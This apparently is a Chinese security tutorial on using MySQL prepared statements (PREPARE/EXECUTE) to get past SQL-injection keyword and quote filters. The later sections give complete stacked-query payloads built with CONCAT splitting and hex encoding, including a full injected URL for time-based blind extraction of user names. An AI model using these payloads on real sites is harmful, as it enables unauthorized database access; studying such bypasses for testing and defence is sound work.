0x01 注意点

要能支持堆叠,如果不能堆叠无法使用

0x02 语法学习

这个好麻烦啊,我就直接抄了,参考文章下面有原文链接
MySQL官方将prepare、execute、deallocate统称为PREPARE STATEMENT
我们就称之为预处理语句,其用法十分简单,来一起看看详细的介绍进行学习把

0x02.1 示例代码

  1. PREPARE stmt_name FROM preparable_stmt
  2. EXECUTE stmt_name
  3. [USING @var_name [, @var_name] ...] -
  4. {DEALLOCATE | DROP} PREPARE stmt_name

0x02.2 举个栗子

  1. mysql> PREPARE pr1 FROM 'SELECT ?+?';
  2. Query OK, 0 rows affected (0.01 sec)
  3. Statement prepared
  4. mysql> SET @a=1, @b=10 ;
  5. Query OK, 0 rows affected (0.00 sec)
  6. mysql> EXECUTE pr1 USING @a, @b;
  7. +------+
  8. | ?+? |
  9. +------+
  10. | 11 |
  11. +------+
  12. 1 row in set (0.00 sec)
  13. mysql> EXECUTE pr1 USING 1, 2; -- 只能使用用户变量传递。
  14. ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
  15. right syntax to use near '1, 2' at line 1
  16. mysql> DEALLOCATE PREPARE pr1;
  17. Query OK, 0 rows affected (0.00 sec)

使用PAREPARE STATEMENT可以减少每次执行SQL的语法分析,比如用于执行带有WHERE条件的SELECT和DELETE,或者UPDATE,或者INSERT,只需要每次修改变量值即可。

同样可以防止SQL注入,参数值可以包含转义符和定界符。
适用在应用程序中,或者SQL脚本中均可

0x02.3 更多用法

同样PREPARE … FROM可以直接接用户变量

  1. mysql> CREATE TABLE a (a int);
  2. Query OK, 0 rows affected (0.26 sec)
  3. mysql> INSERT INTO a SELECT 1;
  4. Query OK, 1 row affected (0.04 sec)
  5. Records: 1 Duplicates: 0 Warnings: 0
  6. mysql> INSERT INTO a SELECT 2;
  7. Query OK, 1 row affected (0.04 sec)
  8. Records: 1 Duplicates: 0 Warnings: 0
  9. mysql> INSERT INTO a SELECT 3;
  10. Query OK, 1 row affected (0.04 sec)
  11. Records: 1 Duplicates: 0 Warnings: 0
  12. mysql> SET @select_test = CONCAT('SELECT * FROM ', @table_name);
  13. Query OK, 0 rows affected (0.00 sec)
  14. mysql> SET @table_name = 'a';
  15. Query OK, 0 rows affected (0.00 sec)
  16. mysql> PREPARE pr2 FROM @select_test;
  17. Query OK, 0 rows affected (0.00 sec)
  18. Statement prepared
  19. mysql> EXECUTE pr2 ;
  20. +------+
  21. | a |
  22. +------+
  23. | 1 |
  24. | 2 |
  25. | 3 |
  26. +------+
  27. 3 rows in set (0.00 sec)
  28. mysql> DROP PREPARE pr2; -- 此处DROP可以替代DEALLOCATE
  29. Query OK, 0 rows affected (0.00 sec)

每一次执行完EXECUTE时,养成好习惯,须执行DEALLOCATE PREPARE … 语句,这样可以释放执行中使用的所有数据库资源(如游标)。

不仅如此,如果一个session的预处理语句过多,可能会达到max_prepared_stmt_count的上限值。
预处理语句只能在创建者的会话中可以使用,其他会话是无法使用的。

而且在任意方式(正常或非正常)退出会话时,之前定义好的预处理语句将不复存在。

如果在存储过程中使用,如果不在过程中DEALLOCATE掉,在存储过程结束之后,该预处理语句仍然会有效。

0x03 例子合集

0x03.1 普通注入

好了,通过上面我们就正式入门了,那么如何拿来注入使用呢?
就通过接下来的例子了
例如现在有一个注入点
http://127.0.0.1/xx/user.php?id=1
其中id参数有注入,但是有很强的过滤,过滤了select、from、where、union那么还能正常读数据嘛?
其实还是可以的,如果支持堆叠的话

在例如现在要读取的数据为 SELECT User FROM user LIMIT 0,1
让我们使用本章节学习到的技能进行变形一下

  1. // @ab = SELECT User FROM user LIMIT 0,1变形
  2. set @a:=CONCAT("S", "E", "T ","@ab:=", "(SE","LECT ", "User FR","OM"," user LIM","IT", " 0,1)");
  3. PREPARE stmt FROM @a;
  4. EXECUTE stmt;
  5. // SELECT if(@ab like '%root%',SLEEP(3),1);变形
  6. set @b:=CONCAT("SE", "LE", "CT ", "i", "f(", "@ab ", "li", "ke '%", "root","%'",",","SL", "EE", "P(3),1);");
  7. PREPARE stmt2 FROM @b;
  8. EXECUTE stmt2;

image.png
image.png

  1. 最后面换成正常注入的话,就是这样子的:
  2. http://127.0.0.1/xx/user.php?id=1';set @a:=CONCAT("S", "E", "T ","@ab:=", "(SE","LECT ", "User FR","OM"," user LIM","IT", " 0,1)");PREPARE stmt FROM @a;EXECUTE stmt;set @b:=CONCAT("SE", "LE", "CT ", "i", "f(", "@ab ", "li", "ke '%", "rootaaaaaaa","%'",",","SL", "EE", "P(3),1);");PREPARE stmt2 FROM @b;EXECUTE stmt2; -- a

0x03.2 数字型注入

如果说站点有数字型注入,并且过滤了select、from、where、union还把单双引号也过滤了
那还是有办法进行注入的

  1. 例如注入的语句:
  2. SELECT if((SELECT User FROM user LIMIT 0,1) like '%root%',SLEEP(3),1);
  3. 先使用hex转成16进制
  4. 找个数据库执行如下语句:
  5. select hex("SELECT if((SELECT User FROM user LIMIT 0,1)like'%root%',SLEEP(3),1)");

image.png

然后在转换一下即可正常注入了

  1. // 正确的情况下
  2. // 语句: SELECT if((SELECT User FROM user LIMIT 0,1) like '%root%',SLEEP(3),1);
  3. SET @c:=0x53454C454354206966282853454C45435420557365722046524F4D2075736572204C494D495420302C3129206C696B65202725726F6F7425272C534C4545502833292C3129;
  4. PREPARE stmt3 FROM @c;
  5. EXECUTE stmt3;

image.png

  1. // 正确的情况下
  2. // 语句: SELECT if((SELECT User FROM user LIMIT 0,1) like '%aaaaaaa%',SLEEP(3),1);
  3. SET @c:=0x53454C454354206966282853454C45435420557365722046524F4D2075736572204C494D495420302C3129206C696B652027256161616161616125272C534C4545502833292C3129;
  4. PREPARE stmt3 FROM @c;
  5. EXECUTE stmt3;

image.png

0x04 参考文章

https://www.jb51.net/article/121763.htm